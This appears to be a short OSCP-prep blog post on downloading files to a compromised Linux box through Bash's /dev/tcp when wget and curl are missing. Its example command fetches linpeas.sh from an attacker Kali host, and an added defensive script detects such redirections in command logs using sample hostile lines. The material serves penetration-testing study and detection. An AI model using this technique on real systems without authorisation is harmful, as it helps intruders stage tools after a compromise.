
OSCP Tip: Downloading Files on Linux When wget, ssh and curl are Missing!

Jose Campo
2 min read · Nov 12, 2024


So, you’ve compromised a Linux box and need to download a file, but there’s a problem: wget is missing. No big deal, right? Just use curl! But wait… curl is also unavailable. Still determined, you try to use ssh, only to find it’s not cooperating either. If you’re feeling like luck isn’t on your side, don’t worry – Linux has a “living off the land” trick that might just save your day! 🌿🐧

Let me introduce you to a nifty technique for downloading files without wget, curl, or even scp. It’s a bit unconventional, but it works.

The Trick: Using /dev/tcp

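By leveraging /dev/tcp, a pseudo-device path that Bash itself interprets in redirections (it is not a real file on disk, so it does not work in sh or dash), you can initiate a network connection and grab files using basic shell commands. Here’s how it works: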

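exec 3<>/dev/tcp/kali-ip/22    # fd 3 becomes a read/write TCP socket
echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: kali-ip\r\nConnection: close\r\n\r\n" >&3
while IFS= read -r line <&3 && [ "$line" != $'\r' ]; do :; done    # skip the response headers
cat <&3 > linpeas.sh    # save only the body
exec 3>&-    # close the socket

In this example:

  1. exec 3<>/dev/tcp/kali-ip/22 opens a bidirectional connection on file descriptor 3 to the specified IP and port (replace kali-ip with your Kali machine’s IP address; the HTTP server there must be listening on the port you give, 22 in this example).
  2. The echo -e command sends an HTTP request to fetch the file, linpeas.sh.
  3. The while read loop consumes the HTTP response headers up to the blank line that ends them; without it, the status line and headers would be saved at the top of the file.
  4. cat <&3 > linpeas.sh reads the rest of the response and writes the contents into a file named linpeas.sh.
  5. exec 3>&- closes the connection.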
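From the defender's side, the same trick leaves a recognisable string wherever shell commands are recorded. The script below is an added example, not code from the original post: it scans command log lines for redirections into /dev/tcp or /dev/udp and reports the destination. The log format, the function names find_devnet and sample_log, and all sample lines are constructed for illustration; it assumes a grep that supports -o (GNU, BSD and BusyBox do).

```shell
#!/bin/sh
# Added example: flag shell commands that open sockets through Bash's
# /dev/tcp and /dev/udp redirections. All log lines below are constructed.

# A redirection operator followed by /dev/{tcp,udp}/<host>/<port>.
# Requiring the operator avoids flagging lines that merely mention the path.
DEVNET_RE='[<>]&?[[:space:]]*/dev/(tcp|udp)/[^/[:space:]]+/[[:alnum:]_-]+'

# Reads log lines on stdin and prints "line_no proto host port" for every hit.
# A single line can produce several hits.
find_devnet() {
    grep -noE "$DEVNET_RE" |
        sed -E 's#^([0-9]+):.*/dev/(tcp|udp)/([^/]+)/(.+)$#\1 \2 \3 \4#'
}

# Constructed sample: "timestamp user command" (hypothetical format).
sample_log() {
    cat <<'EOF'
2024-11-12T10:01:03Z www-data bash -c 'exec 3<>/dev/tcp/192.0.2.10/22'
2024-11-12T10:01:09Z www-data cat <&3 > linpeas.sh
2024-11-12T10:02:41Z deploy tar czf /tmp/site.tgz /var/www
2024-11-12T10:03:15Z deploy man bash | grep -n '/dev/tcp/host/port'
2024-11-12T10:04:50Z www-data echo ping > /dev/udp/192.0.2.10/53; cat < /dev/tcp/198.51.100.7/http
EOF
}

sample_log | find_devnet
```

String matching only sees paths that appear literally in the log, so pair it with network telemetry that attributes outbound connections to shell processes such as bash.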
